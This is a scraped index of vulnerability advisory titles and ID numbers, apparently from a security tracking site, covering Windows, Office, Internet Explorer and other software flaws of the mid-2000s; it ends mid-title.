Kernel ALPC Validation Flaw Lets Local Users Gain Elevated Privileges [1019074] Windows Media Format Runtime ASF File Parsing Bug Lets Remote Users Execute Arbitrary Code [1019073] Microsoft DirectX Bugs in Parsing SAMI, WAV, and AVI Files Let Remote Users Execute Arbitrary Code [1019072] Windows Vista Server Message Block v2 Signature Flaw Lets Remote Users Execute Arbitrary Code [1019064] Windows Media Player Stack Overflow in 3ivx Codec Lets Remote Users Execute Arbitrary Code [1019046] Cisco Security Agent for Windows Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019033] Microsoft Web Proxy Auto-Discovery Name Server Resolution Bug Lets Remote Users Conduct Man-in-the-Middle Attacks [1019001] Symantec Backup Exec for Windows Servers Lets Remote Users Deny Service [1018976] Microsoft Jet Engine Stack Overflow May Let Remote Users Execute Arbitrary Code [1018903] Microsoft DebugView 'Dbgv.sys' Module Lets Local Users Gain Kernel Level Privileges [1018833] Windows Macromedia Security Driver Buffer Overflow Lets Local Users Gain Elevated Privileges [1018832] Windows Mobile SMS Handler Bug Lets Remote Users Obfuscate SMS Message Source Addresses [1018790] Microsoft Word Bug in Processing Office Files Lets Remote Users Execute Arbitrary Code [1018789] Microsoft SharePoint Input Validation Hole Permits Cross-Site Scripting Attacks [1018788] Microsoft Internet Explorer Bugs Let Remote Users Spoof the Address Bar and Execute Arbitrary Code [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018786] Microsoft Outlook Express Bug in Processing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018785] Windows Mail Bug in Parsing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018727] Microsoft Internet Security and Acceleration Server SOCKS4 Proxy Discloses IP Address Information to Remote Users [1018678] Windows Services for UNIX Lets Local Users Gain Elevated Privileges [1018677] Microsoft Agent ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018676] Microsoft Visual Basic VBP File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018617] Subversion Windows Client Input Validation Flaw in filename Parameter Lets Remote Authenticated Users Create/Overwrite Files [1018575] Safari for Windows Lets Remote Users Upload Arbitrary File [1018568] Microsoft Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018567] Microsoft Virtual PC/Server Heap Overflow Lets Local Users Gain Elevated Privileges [1018566] Windows Bugs in the Contacts, Feed Headlines, and Weather Gadgets Let Remote Users Execute Arbitrary Code [1018565] Windows Media Player Skin File Header Processing Bugs Let Remote Users Execute Arbitrary Code [1018563] Microsoft GDI Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018562] Microsoft Internet Explorer CSS and ActiveX Control Bugs Let Remote Users Execute Arbitrary Code [1018561] Microsoft Excel Workspace Index Validation Bug Lets Remote Users Execute Arbitrary Code [1018560] Microsoft OLE Automation Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1018559] Microsoft Core XML Services Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018551] Microsoft DirectX Buffer Overflow in FlashPix ActiveX Control Lets Remote Users Execute Arbitrary Code [1018520] Microsoft Visual Database Tools Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1018420] Microsoft DirectX Heap Overflow in Processing RLE-Compressed Targa Images Lets Remote Users Execute Arbitrary Code [1018412] Mozilla Firefox Lets Remote Users Inject Arbitrary Content into 'about:blank' Windows [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1018355] Windows Active Directory Bug in Processing LDAP Convertible Attributes Lets Remote Users Execute Arbitrary Code [1018354] Windows Vista Firewall Teredo Interface Discloses Network Information to Remote Users and May Let Remote Users Bypass Firewall Rules [1018353] Microsoft Office Publisher Lets Remote Users Execute Arbitrary Code [1018352] Microsoft Excel Caculation Error and Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018351] Microsoft Internet Explorer Bug in Firefox URL Protocol Handler Lets Remote Users Execute Arbitrary Commands [1018321] Microsoft Excel Sheet Name Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018318] Nessus Input Validation Hole in Windows GUI Permits Cross-Site Scripting Attacks [1018251] Microsoft Office Buffer Overflow in MSODataSourceControl ActiveX Control May Let Remote Users Execute Arbitrary Code [1018235] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1018234] Windows Mail MHTML Protocol Handler Content-Disposition Bug Lets Remote Users Obtain Information [1018232] Windows Mail MHTML Protocol Handler Redirect Bug Lets Remote Users Obtain Information [1018230] Windows Input Validation Flaw in Win32 API Lets Remote and Local Users Execute Arbitrary Code [1018226] Windows Schannel Digital Signature Bug Lets Remote Users Execute Arbitrary Code [1018225] Windows Vista Discloses Sensitive Information to Local Users [1018202] Microsoft GDI+ ICO File Divide By Zero Bug Lets Remote Users Deny Service [1018193] Microsoft Internet Explorer Lets Remote Users Spoof Certain Objects [1018192] Microsoft Internet Explorer Input Validation Hole Permits Cross-Site Scripting Attacks [1018188] Symantec VERITAS Storage Foundation Windows Scheduler Service Lets Remote Users Execute Arbitrary Commands [1018107] Microsoft Office Buffer Overflow in OUACTRL.OCX ActiveX Control Lets Remote Users Execute Arbitrary Code [1018019] Microsoft Internet Explorer Bugs Let Remote Users Modify Files or Execute Arbitrary Code [1018017] Microsoft CAPICOM 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018016] Microsoft BizTalk Server 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018015] Microsoft Exchange Base64, iCal, IMAP, and Attachment Processing Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1018014] Microsoft Office Drawing Object Validation Flaw Lets Remote Users Execute Arbitrary Code [1018013] Microsoft Word Array and RTF Processing Bugs Let Remote Users Execute Arbitrary Code [1018012] Microsoft Excel Specially Crafted BIFF Records, Set Font Values, and Filter Records Permit Remote Code Execution [1017969] Microsoft Internet Explorer Digest Authentication Bug Lets Remote Users Conduct HTTP Request Splitting Attacks [1017902] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1017898] Windows Kernel Memory Mapping Permission Error Lets Local Users Gain System Privileges [1017897] Windows Vista Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1017896] Microsoft Agent URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1017895] Windows XP Universal Plug and Play Lets Remote Users on the Local Subnet Execute Arbitrary Code [1017894] Microsoft Content Management Server Permits Cross-Site Scripting Attacks and Lets Remote Users Execute Arbitrary Code [1017847] Windows Kernel GDI Color Parameter Bug Lets Local Users Gain System Privileges [1017846] Windows Kernel GDI Input Validation Flaw in Processing Application Size Parameters Lets Local Users Gain System Privileges [1017845] Windows TrueType Font Rasterizer Lets Local Users Gain System Privileges [1017844] Windows Kernel EMF Image Processing Bug Lets Local Users Gain System Privileges [1017843] Windows Kernel WMF Image Processing Lets Remote Users Deny Service [1017816] Windows Mail URL Bug Lets Remote Users Cause Execute Existing Code on the Target User's System to Be Executed [1017712] Citrix Presentation Server Client for Windows Lets Remote Users Execute Arbitrary Code [1017694] VeriSign Secure Messaging for Microsoft Exchange Stack Overflow in ConfigChk ActiveX Control Lets Remote Users Execute Arbitrary Code [1017653] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017643] Microsoft Internet Explorer Multiple COM Objects Let Remote Users Execute Arbitrary Code [1017642] Microsoft Internet Explorer FTP Server Response Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017640] Microsoft Office OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017639] Microsoft Word Macro Security Warning Bug and Drawing Object Memory Corrupution Error Lets Remote Users Execute Arbitrary Code [1017638] Microsoft MFC Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017637] Microsoft OLE Dialog RTF File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017635] Microsoft HTML Help ActiveX Control Lets Remote Users Execute Arbitrary Code [1017634] Windows Image Acquisition Service Buffer Overflow Lets Local Users Gain System Privileges [1017633] Windows Shell Hardware Detection Service Parameter Validation Error Lets Local Users Gain Elevated Privileges [1017632] Microsoft Step-by-Step Interactive Training Buffer Overflow in Processing Bookmark Links Lets Remote Users Execute Arbitrary Code [1017609] HP OpenView Network Node Manager Unsafe Folder Permissions Lets Local Windows Users Gain Elevated Privileges [1017584] Microsoft Office Excel Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017579] [Duplicate Entry] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017564] Microsoft Word Function Processing Bug Lets Remote Users Execute Arbitrary Code [1017530] Microsoft Help Workshop Buffer Overflow in Processing '.CNT' Files Lets Remote Users Execute Arbitrary Code [1017489] Windows Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017488] Microsoft Outlook '.iCal', '.oss', and SMTP Header Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1017487] Microsoft Excel Buffer Overflows in Processing Various Records and Strings Lets Remote Users Execute Arbitrary Code [1017486] Microsoft Office Brazilian Portuguese Grammar Checker Lets Remote Users Execute Arbitrary Code [1017485] Microsoft Excel Memory Access Error Lets Remote Users Execute Arbitrary Code [1017454] Windows Client-Server Run-time Subsystem NtRaiseHardError Discloses Memory to Local Users [1017433] Windows Client-Server Run-time Subsystem Lets Remote Users Execute Arbitrary Code [1017401] Mozilla Firefox Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017400] Mozilla Thunderbird Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017399] Mozilla Seamonkey Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017397] Microsoft Outlook Recipient ActiveX Control Lets Remote Users Deny Service [1017390] Microsoft Word Unchecked Count Vulnerability Lets Remote Users Execute Arbitrary Code [1017388] Microsoft Project Discloses Database Password to Remote Authenticated Users [1017374] Microsoft Internet Explorer May Disclose Contents of the Temporary Internet Files Folder to Remote Users [1017373] Microsoft Internet Explorer DHTML and Script Error Handling Bugs Let Remote Users Execute Arbitrary Code [1017372] Windows Media Player and Windows Media Format Runtime ASF File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017371] Windows SNMP Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017370] Windows Client-Server Run-time Subsystem Lets Local Users Gain System Privileges [1017368] Windows Remote Installation Service TFTP Server Lets Remote Users Overwrite Files to Execute Arbitrary Code [1017358] Microsoft Word Data Structure Processing Bug Lets Remote Users Cause Arbitrary Code to Be Executed [1017354] Windows Media Player ASX Playlist File Buffer Overflow May Let Remote Users Execute Arbitrary Code [1017339] Microsoft Word String Processing Bug Lets Remote Users Execute Arbitrary Code [1017330] Windows Print Spooler Subsystem GetPrinterData() Function Lets Remote Users Deny Service [1017224] Microsoft Client Service for Netware Buffer Overflows Let Remote Users Execute Arbitrary Code and Crash the System [1017223] Microsoft Internet Explorer Bug in Rending HTML Layout Combinations May Let Remote Users Execute Arbitrary Code [1017222] Microsoft Agent '.ACF' File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017221] Windows Workstation Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017165] Microsoft Internet Explorer 'ieframe.dll' Lets Remote Users Spoof Invalid Certificates [1017157] Microsoft XML Core Services ActiveX Control Lets Remote Users Execute Arbitrary Code [1017142] Microsoft Visual Studio WMI Object Broker ActiveX Control Lets Remote Users Execute Arbitrary Code [1017133] Microsoft NAT Helper 'ipnathlp.dll' Lets Remote Users Deny Service [1017127] Microsoft Data Access Components 'ADODB.Connection' Execute Function Lets Remote Users Execute Arbitrary Code [1017122] Microsoft Internet Explorer Lets Remote Users Partially Spoof Address Bar URLs [1017059] Microsoft PowerPoint Bug Causes PowerPoint to Crash [1017037] Windows Object Packager RTF File Object Lets Remote Users Execute Arbitrary Code [1017035] Windows Server Service SMB Rename Null Pointer Dereference Lets Remote Users Deny Service [1017034] Microsoft Office String, Chart Record, and SmartTag Validation Errors Let Remote Users Execute Arbitrary Code [1017033] Microsoft XML Core Services Lets Remote Users Execute Arbitrary Code or Obtain Information [1017032] Microsoft Word String and Mail Merge Record Validation Flaws Let Remote Users Execute Arbitrary Code [1017031] Microsoft Excel DATETIME/COLINFO Record Errors and Lotus 1-2-3 Errors Let Remote Users Execute Arbitrary Code [1017030] Microsoft PowerPoint Errors in Parsing Object Pointers and Data Records Lets Remote Users Execute Arbitrary Code [1017018] Cisco Secure Desktop May Let Local Users Access Data Via Windows Operating System Files [1016937] Microsoft PowerPoint Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016886] [Duplicate] Microsoft PowerPoint Bug Lets Remote Users Execute Arbitrary Code [1016879] Microsoft Internet Explorer VML Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016854] Microsoft Internet Explorer Buffer Overflow in 'daxctle.ocx' ActiveX in KeyFrame Method Control Lets Remote Users Execute Arbitrary Code [1016839] Microsoft Internet Explorer URLMON.DLL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016827] Microsoft PGM Implementation Buffer Overflow in MSMQ Service Lets Remote Users Execute Arbitrary Code [1016826] Windows Indexing Service Input Validation Flaw in Query Parameters Permits Cross-Site Scripting Attacks [1016825] Microsoft Publisher Buffer Overflow in Parsing '.pub' Files Lets Remote Users Execute Arbitrary Code [1016787] Microsoft Word Record Validation Vulnerability Lets Remote Users Execute Arbitrary Code [1016764] Microsoft Internet Explorer (IE) Buffer Overflow in 'daxctle.ocx' ActiveX Control Lets Remote Users Execute Arbitrary Code [1016731] Microsoft Internet Explorer URL Buffer Overflow in Processing HTTP 1.1 Protocol with Compression Lets Remote Users Execute Arbitrary Code [1016720] [Duplicate Entry] Microsoft PowerPoint Unknown Bug May Let Remote Users Execute Arbitrary Code [1016667] Windows Server Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016663] Microsoft Internet Explorer Bugs Let Remote Users Obtain Information or Execute Arbitrary Code [1016662] Windows 2000 Kernel Winlogon Alternate Path Lets Local Users Gain Elevated Privileges. [1016661] Windows Kernel Incorrect Exception Handling Lets Remote Users Execute Arbitrary Code [1016659] Windows Hyperlink Object Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016658] Windows 2000 Kernel Buffer Overflow Lets Local Users Gain Elevated Privileges [1016657] Microsoft Office Buffer Overflow in Processing PowerPoint Records Lets Remote Users Execute Arbitrary Code [1016656] Microsoft Visual Basic for Applications Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016655] Microsoft Management Console Input Validation Hole Permits Remote Code Execution [1016654] Microsoft Outlook Express MHTML Parsing Error Lets Remote Users Execute Arbitrary Code [1016653] Windows Winsock and DNS Client Buffer Overflows Let Remote Users Execute Arbitrary Code [1016606] Windows Server Service Null Pointer Comparison Lets Remote Users Deny Service [1016506] Microsoft Internet Security and Acceleration Server HTTP File Exentsion Filter Can Be Bypassed By Remote Users [1016504] Microsoft Works Buffer Overflow in Processing Spreadsheet Files May Let Remote Users Execute Arbitrary Code [1016496] Microsoft PowerPoint 'mso.dll' Buffer Overflow May Let Remote Users Execute Arbitrary Code [1016472] Microsoft Excel Errors in Processing Various Malformed Records Let Remote Users Execute Arbitrary Code [1016470] Microsoft Office PNG and GIF File Buffer Error Lets Remote Users Execute Arbitrary Code [1016469] Microsoft Office String Parsing and Property Bugs Let Remote Users Execute Arbitrary Code [1016468] Microsoft DHCP Client Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016467] Windows Server Service Buffer Overflows Let Remote Users View SMB Information and Execute Arbitrary Code [1016466] Microsoft Internet Information Server (IIS) Buffer Overflow in Processing ASP Pages Lets Remote Authenticated Users Execute Arbitrary Code [1016453] Microsoft Office LsCreateLine() Function May Let Remote Users Execute Arbitrary Code [1016434] Microsoft HTML Help Heap Overflow in HHCtrl ActiveX Control May Let Remote Users Execute Arbitrary Code [1016430] Microsoft Excel STYLE Record Bug May Let Remote Users Execute Arbitrary Code [1016375] Webmin for Windows Error in Parsing '\' Backslash Character Permits Directory Traversal Attacks [1016373] Windows Live Messenger Contact List Heap Overflow [1016344] Microsoft Excel 'Shockwave Flash Object' Lets Remote Users Execute Code Automatically [1016316] Microsoft Excel Memory Validation Flaw May Let Remote Users Cause Arbitrary Code to Be Executed [1016291] Microsoft Internet Explorer Multiple Memory and Access Control Errors Let Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016288] Windows Server Message Block Processing Bugs Let Local Users Gain Elevated Privileges or Deny Service [1016287] Microsoft PowerPoint Buffer Overflow in Processing Malformed Records Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1016284] Windows Media Player Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1016283] Microsoft JScript Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016280] Microsoft Outlook Web Access Input Validation Hole Permits Cross-Site Scripting Attacks [1016196] F-Secure Anti-Virus for Microsoft Exchange Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code [1016156] Cisco VPN Client for Windows Lets Local Users Gain Elevated Privileges [1016130] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1016048] Microsoft Exchange Error in Processing iCAL/vCAL Properties Lets Remote Users Execute Arbitrary Code [1016047] Microsoft Distributed Transaction Coordinator Bugs Let Remote Users Deny Service [1016005] Microsoft Outlook Express 'mhtml:' Redirect URL Processing Lets Remote Users Bypass Security Domains [1016001] Microsoft Internet Explorer Bug in Processing Nested OBJECT Tags Lets Remote Users Execute Arbitrary Code [1015969] HP StorageWorks Secure Path for Windows Lets Remote Users Deny Service [1015950] Neon Responders for Windows Can Be Crashed By Remote Users [1015900] Microsoft Internet Explorer Parsing and State Errors Let Remote Users Execute Arbitrary Code [1015899] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar URL [1015896] Microsoft FrontPage Server Extensions Input Validation Holes Permit Cross-Site Scripting Attacks [1015895] Microsoft SharePoint Team Services Input Validation Holes Permit Cross-Site Scripting Attacks [1015894] Microsoft Data Access Components RDS.Dataspace Access Control Bug Lets Remote Users Execute Arbitrary Code [1015892] Microsoft Internet Explorer Popup Window Object Bugs Let Remote Users Execute Scripting Code in Arbitrary Domains [1015855] Microsoft Office Array Index Boundary Error Lets Remote Users Execute Arbitrary Code [1015825] Microsoft ASP.NET Incorrect COM Component Reference Lets Remote Users Deny Service [1015812] Microsoft Internet Explorer createTextRange() Memory Error Lets Remote Users Execute Arbitrary Code [1015800] (Vendor Issues Fix) Microsoft Internet Explorer (IE) Lets Remote Users Cause HTA Files to Be Executed [1015794] (Vendor Issues Fix) Microsoft Internet Explorer 'mshtml.dll' Bug in Processing Multiple Action Handlers Lets Remote Users Deny Service [1015785] Veritas Backup Exec for Windows Servers Media Server Format String Bug in BENGINE May Let Remote Users Execute Arbitrary Code [1015766] Microsoft Office and Excel Buffer Overflows Let Remote Users Execute Arbitrary Code [1015720] Microsoft Internet Explorer Modal Security Dialog Race Condition May Let Remote Users Install Code or Obtain Information [1015632] Microsoft PowerPoint May Let Users Access Contents of the Temporary Internet Files Folder [1015631] Microsoft Office Korean Input Method Editor Lets Local Users Gain Elevated Privileges [1015628] Windows Media Player Plug-in for 3rd Party Browsers Buffer Overflow in Processing EMBED Elements Lets Remote Users Execute Arbitrary Code [1015627] Windows Media Player Bitmap File Bug May Let Remote Users Execute Arbitrary Code [1015585] Microsoft HTML Help Workshop Buffer Overflow in Processing .hhp Files Lets Remote User Execute Arbitrary Code [1015559] Microsoft Internet Explorer Shockwave Flash Scripting Bug Lets Remote Users Deny Service [1015489] Microsoft Wireless Network Connection Software May Broadcast Ad-Hoc SSID Information in Certain Cases [1015461] Microsoft Outlook Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015460] Microsoft Exchange Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015376] Microsoft IIS Lets Remote Users Deny Service or Execute Arbitrary Code With Malformed HTTP GET Requests [1015350] Microsoft Internet Explorer Bug in Using HTTPS Proxies May Disclose Web URLs to Remote Users [1015348] Microsoft Internet Explorer Bug in Instantiating COM Objects May Let Remote Users Execute Arbitrary Code [1015333] Microsoft Excel Unspecified Stack Overflow May Let Remote Users Cause Arbitrary Code to Be Executed [1015251] Microsoft Internet Explorer Bug in Processing Mismatched Document Object Model Objects May Let Remote Users Execute Arbitrary Code [1015226] Microsoft AntiSpyware Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015224] Kaspersky Anti-Virus for Windows File Servers Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015222] Apple iTunes for Windows Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015143] F-Secure Anti-Virus for Microsoft Exchange Web Console May Disclose Files to Remote Users [1015101] Microsoft Internet Explorer J2SE Runtime Environment Bug Lets Remote Users Crash the Target User's Browser [1015043] Microsoft Network Connection Manager Lets Remote Users Deny Service [1015041] Microsoft Client Service for NetWare Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015038] Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015034] Microsoft DirectX DirectShow Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014899] AVIRA Desktop for Windows Buffer Overflow in Processing ACE Archives May Let Remote Users Execute Arbitrary Code [1014871] NOD32 for Windows Buffer Overflow in Processing ARJ Archives May Let Remote Users Execute Arbitrary Code [1014809] Microsoft Internet Explorer Unspecified Bug May Permit Remote Code Execution [1014777] Microsoft IIS ASP Error Page May Disclose System Information in Certain Cases [1014727] Microsoft 'msdds.dll' COM Object Lets Remote Users Execute Arbitrary Code [1014643] Microsoft Internet Explorer COM Object Instantiation Bug May Let Remote Users Execute Arbitrary Code [1014641] Microsoft Internet Explorer Web Folder URL Validation Bug Lets Remote Users Execute Scripting Code in an Arbitrary Security Domain [1014566] Windows Buffer Overflow in Unspecified USB Device Driver Lets Physically Local Users Execute Arbitrary Code [1014500] Microsoft Internet Explorer (IE) JPEG Rendering Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1014458] Microsoft Office Buffer Overflow in Parsing Fonts Lets Remote Users Cause Arbitrary Code to Be Executed [1014457] Microsoft Microsoft Color Management Module Lets Remote Users Execute Arbitrary Code [1014364] Microsoft Internet Information Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014356] Microsoft ISA Server May Accept HTTP Authentication Even When SSL Is Required [1014352] Microsoft Front Page May Crash When Editing a Specially Crafted Web Page [1014329] Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code [1014261] Microsoft Internet Explorer Lets Remote Users Spoof Javascript Dialog Boxes [1014201] Microsoft Internet Explorer Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1014200] Microsoft Outlook Express Buffer Overflow in NNTP Response Parser Lets Remote Users Execute Arbitrary Code [1014199] Microsoft Outlook Web Access Input Validation Hole in IMG Tags Permits Cross-Site Scripting Attacks [1014197] Microsoft Agent Lets Remote Users Spoof Security Dialog Box Contents [1014195] Microsoft HTML Help Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1014194] Microsoft Step-by-Step Interactive Training Bookmark Link File Validation Flaw Lets Remote Users Execute Arbitrary Code [1014193] Microsoft Internet Security and Acceleration Server Bugs Let Remote Users Poison the Cache and Establish NetBIOS Connections [1014178] Symantec pcAnywhere 'Launch With Windows' Properties Let Local Users Gain Elevated Privileges [1014174] Microsoft Internet Explorer Lets Remote Users Obfuscate Scripting Code [1014131] SMTP Server for Windows NT/2000/XP/2003 Lets Remote Users Crash the SMTP Service [1014113] Microsoft ISA Server in SecureNAT Configuration Can Be Crashed By Remote Users [1014050] Computer Associates eTrust Antivirus Integer Overflow in Processing Microsoft OLE Data Lets Remote Users Execute Arbitrary Code [1013996] Microsoft ASP.NET May Disclose System Information to Remote Users in Certain Cases [1013945] Windows Media Player License Acquisition Feature May Let Remote Users Redirect Users to Arbitrary Web Pages [1013692] Microsoft Internet Explorer Buffer Overflows in DHTML, URL Parsing, and Content Advisor Let Remote Users Execute Arbitrary Code [1013691] Microsoft Message Queuing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013687] Microsoft Exchange Heap Overlow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code [1013684] Microsoft Word Unspecified Buffer Overflow in Processing Documents Lets Remote Users Execute Arbitrary Code [1013669] Microsoft Outlook Web Access 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013668] Microsoft Outlook 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013618] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code [1013583] Microsoft Outlook Connector for IBM Lotus Domino Lets Users Bypass Password Storage Policy [1013454] Microsoft Office InfoPath 2003 May Disclose System and Authentication Information to Remote Users [1013436] GoodTech Telnet Server for Windows NT/2000/XP/2003 Buffer Overflow in Administration Port Lets Remote Users Execute Arbitrary Code [1013205] Microsoft Internet Explorer Can Be Crashed With URL Containing Special URL Characters [1013126] Microsoft Internet Explorer CDF Scripting Error Lets Remote Users Execute Scripting Code in Arbitrary Domains [1013125] Microsoft Internet Explorer DHTML Method Heap Overflow Lets Remote Users Execute Arbitrary Code [1013124] Microsoft Internet Explorer URL Encoding Error Lets Remote Users Spoof Arbitrary URLs and Execute Scripting Code in Arbitrary Security Zone [1013111] Microsoft SharePoint Services Redirection Query Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1013110] Microsoft Office XP Buffer Overflow in Processing URLs Lets Remote Users Execute Arbitrary Code [1013108] Mozilla Firefox Hybrid Image Bug Allows Batch Statements to Be Draged to the Desktop and Tabbed Javascript Bugs Let Remote Users Access Other Windows [1013086] Microsoft Outlook Web Access 'owalogon.asp' Lets Remote Users Redirect Login Requests [1012836] Microsoft HTML Help Active Control Cross-Domain Error Lets Remote Users Execute Arbitrary Commands [1012835] Microsoft Cursor and Icon Validation Error Lets Remote Users Execute Arbitrary Code [1012833] Windows Indexing Service Buffer Overflow in Processing Queries Lets Remote Users Execute Arbitrary Code [1012706] netcat for Windows Buffer Overflow in doexec Lets Remote Users Execute Arbitrary Code [1012652] Spy Sweeper Enterprise Windows Tray Icon Lets Local Users Gain Elevated Privileges [1012584] Microsoft IE dhtmled.ocx Lets Remote Users Execute Cross-Domain Scripting Attacks [1012518] Microsoft HyperTerminal Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012517] Microsoft WINS Buffer Overflow in Name Value Lets Remote Users Execute Arbitrary Code [1012514] Microsoft WordPad Error in Converting Tables/Fonts Lets Remote Users Execute Arbitrary Code [1012512] Microsoft LSASS Bug in Validating Identity Tokens Lets Local Users Gain Elevated Privileges [1012461] KDE Konqueror Lets Remote Users Inject Content into Open Windows [1012460] Opera Lets Remote Users Inject Content into Open Windows [1012459] Apple Safari Lets Remote Users Inject Content into Open Windows [1012457] Mozilla Firefox Lets Remote Users Inject Content into Open Windows [1012444] Microsoft Internet Explorer Input Validation Error in Processing FTP URLs May Let Remote Users Inject Arbitrary FTP Commands [1012341] Microsoft WINS Memory Overwrite Lets Remote Users Execute Arbitary Code [1012288] Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms [1012272] Mailtraq Windows Tray Icon Lets Local Users Gain System Privileges [1012271] Altiris AClient Service Windows Tray Icon Lets Local Users Gain System Privileges [1012234] Microsoft Internet Explorer on XP SP2 Has Unspecified Flaws That Let Remote Users Bypass File Download Restrictions [1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012138] Microsoft IE Discloses Whether Specified Files Exist to Remote Users [1012057] F-Secure Anti-Virus for Microsoft Exchange Lets Remote Users Bypass Anti-Virus Detection With a ZIP Archive [1012049] (Exploit Code Has Been Released) Microsoft Internet Explorer Buffer Overflow in IFRAME/EMBED Tag Processing Lets Remote Users Execute Arbitrary Code [1011987] Microsoft Internet Explorer Lets Remote Users Spoof the Status Bar Address with a Table Within a Link [1011895] Microsoft IE for Mac Multi-Window Browsing Errors Let Remote Users Spoof Sites [1011890] Microsoft Outlook May Display Images in Plaintext Only Mode [1011851] Microsoft IE AnchorClick Behavior and HTML Help Let Remote Users Execute Arbitrary Code [1011735] Microsoft Internet Explorer May Display the Incorrect URL When Loading a Javascript Homepage [1011706] Microsoft Operating System 'asycpict.dll' Lets Remote Users Crash the System [1011678] Microsoft IE MSN 'heartbeat.ocx' Component Has Unspecified Flaw [1011646] Microsoft Program Group Converter Buffer Overflow Lets Remote Users Execute Arbitrary Code [1011645] Microsoft Various Operating System Flaws Lets Remote Users Execute Code and Local Users Gain Elevated Privileges or Deny Service [1011644] Microsoft IE Plug-in Navigation Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011643] Microsoft IE Double Byte Parsing Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011642] Microsoft IE SSL Caching Flaw Lets Remote Users Run Scripting Code in the Context of Arbitrary Secure Sites [1011640] Microsoft IE Buffer Overflow in Install Engine Lets Remote Users Execute Arbitrary Code [1011639] Microsoft IE Buffer Overflow in Processing Cascading Style Sheets Lets Remote Users Execute Arbitrary Code [1011636] Microsoft SMTP Service Buffer Overflow in Processing DNS Responses May Let Remote Users Execute Arbitrary Code [1011635] Microsoft Excel Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1011634] Microsoft NetDDE Buffer Overflow Lets Remote Users Execute Arbitrary Code With System Privileges [1011633] Microsoft IIS WebDAV XML Message Handler Error Lets Remote Users 